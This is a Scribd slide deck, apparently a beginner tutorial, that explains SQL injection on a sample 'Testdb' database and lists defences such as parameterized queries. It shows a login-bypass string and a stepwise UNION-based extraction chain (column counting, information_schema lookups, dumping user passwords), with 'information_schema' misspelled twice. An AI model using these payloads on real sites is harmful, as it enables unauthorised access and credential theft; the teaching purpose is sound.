KEMBAR78
SQL Injection | PDF
Scribd
Upload
6 views12 pages

SQL Injection

Uploaded by

mehedi.babu.cit.bd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
6 views12 pages

SQL Injection

Uploaded by

mehedi.babu.cit.bd
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 12

What is SQL injection?

SQL Injection is an injection


technique that allows
attackers to inject malicious
SQL queries.
How does It work?

password=admin " or "1" = "1" --+

Since 1=1 is always true, the above


query will be evaluated as true,
irrespective of passwords.
Database: Testdb

table: users
ID user password

1 Alex Alex

2 John John123

3 Roy Roy123

http://Url UNION SELECT user, password FROM users--+

This will return us all the passwords


from the table users.
Problems

• No idea about the number of columns.


• we have no idea about table names
and databases.

• No idea about column name.


How to find the database name?

Before finding the database name, we


need to find the number of columns.
ORDER BY 1

ORDER BY 2

ORDER BY 3

So, if we get an error at 3 then the


number of columns is equal to 2.
How to get the database name?

since we have 2 columns

UNION SELECT database(),database()


This will return the database name
Testdb
How to get the table name?

table_name,table_name
UNION SELECT
FROM information_shema.tables WHERE
table_schema = "Testdb"

This will return table name users


How to get the column name?

UNION SELECT column_name,column_name FROM


information_shema.columns WHERE table_schema =
"Testdb" AND table_name = "users"

This will return column names user,


password.
Now we can use the following query
http://url UNION SELECT user, password FROM users--+

This will return,

ID user password

1 Alex Alex

2 John John123

3 Roy Roy123
How to prevent?

• Use of Prepared Statements (with Parameterized Queries).


• Use of Properly Constructed Stored Procedures.
• Allow-list Input Validation.
• Escaping All User Supplied Input.
• Enforcing Least Privilege.
• Performing Allow-list Input Validation as a Secondary Defense.
Do you find it helpful?

Linkedin: https://www.linkedin.com/in/akshay-9675912
Github: https://github.com/WIZARD00007/

You might also like